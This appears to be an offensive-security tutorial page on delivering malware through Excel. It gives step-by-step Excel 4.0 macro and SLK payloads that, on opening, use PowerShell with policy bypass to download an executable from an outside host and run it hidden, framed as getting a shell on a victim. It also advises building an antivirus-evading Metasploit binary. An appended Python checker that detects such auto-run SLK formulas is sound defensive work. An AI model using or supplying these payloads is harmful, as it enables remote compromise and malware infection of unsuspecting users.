Using a Microsoft Excel payload for an initial foothold is an old method, but it is still widely used by APTs.

Microsoft Excel 4.0 Macro Payload

Right-click on the workbook and click Insert.

Select MS Excel 4.0 Macro.

Paste the following payload:

=EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe")
=WAIT(NOW()+"00:00:10")
=EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe")
=HALT()

Now select the first cell and rename it to Auto_Open.

Save as Excel 97-2003 Workbook (XLS).

When the victim clicks Enable Content, we get a shell.

Microsoft Excel SLK Payload

Generate a binary using Metasploit. Make sure it bypasses AV.

Open Notepad and paste:

ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.88.168:8000/20.exe -outfile c:\users\public\20.exe")
C;X1;Y102;K0;EWAIT(NOW()+"00:00:10")
C;X1;Y103;K0;EEXEC("powershell.exe c:\users\public\20.exe")
C;X1;Y104;K0;EHALT()
E

And save it as Test.slk.

When the victim double-clicks the file and clicks Enable Content, it downloads the binary and executes it; as a result, we get a shell.
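
Because an SLK file is plain text, the record layout shown above can be triaged before anyone opens the file. The following Python check is an added example, not part of the original page: it finds NN records that define an Auto_open name, resolves the cell the name points to, and reports EXEC, CALL or REGISTER formulas reachable from it. The names scan_slk, fields and SAMPLE are this example's own, the sample is constructed with placeholder commands, and matching any name that starts with "auto_open" is a deliberately broad assumption.

```python
import re

RISKY = re.compile(r"\b(EXEC|CALL|REGISTER)\s*\(", re.I)  # XLM functions that run code
REF = re.compile(r"R(\d+)C(\d+)$", re.I)                   # absolute R1C1 reference

def fields(record):
    """Split one SYLK record on ';' (';;' is an escaped literal semicolon)."""
    parts = re.split(r"(?<!;);(?!;)", record.rstrip("\r\n"))
    return parts[0], {p[0]: p[1:].replace(";;", ";") for p in parts[1:] if p}

def scan_slk(text):
    """Return (name, cell, formula) for each risky formula an auto-run name reaches."""
    cells, entry_points, x, y = {}, [], 1, 1
    for line in text.splitlines():
        rtype, f = fields(line)
        if rtype == "NN" and f.get("N", "").lower().startswith("auto_open"):
            m = REF.search(f.get("E", ""))
            if m:
                entry_points.append((f["N"], int(m.group(1)), int(m.group(2))))
        elif rtype == "C":
            # X (column) and Y (row) are optional and carry over from the previous record.
            x, y = int(f.get("X", x)), int(f.get("Y", y))
            if "E" in f:
                cells[(y, x)] = f["E"]
    findings = []
    for name, row, col in entry_points:
        # Walk down the column from the entry cell, stopping at HALT/RETURN.
        # Simplification: this check also stops at the first cell with no formula.
        while (row, col) in cells:
            formula = cells[(row, col)]
            if RISKY.search(formula):
                findings.append((name, f"R{row}C{col}", formula))
            if re.match(r"(HALT|RETURN)\s*\(", formula, re.I):
                break
            row += 1
    return findings

# Constructed sample using the page's record layout; the commands are placeholders.
SAMPLE = "\n".join([
    "ID;P", "O;E", "NN;NAuto_open;ER101C1;KOut Flank;F",
    'C;X1;Y101;K0;EEXEC("placeholder-one.exe")',
    'C;Y102;K0;EWAIT(NOW()+"00:00:10")',
    'C;Y103;K0;EEXEC("placeholder-two.exe")',
    "C;Y104;K0;EHALT()", "E",
])

if __name__ == "__main__":
    print(*scan_slk(SAMPLE), sep="\n")
```

The check does not follow GOTO or jumps into other columns, so an empty result means only that this check found nothing.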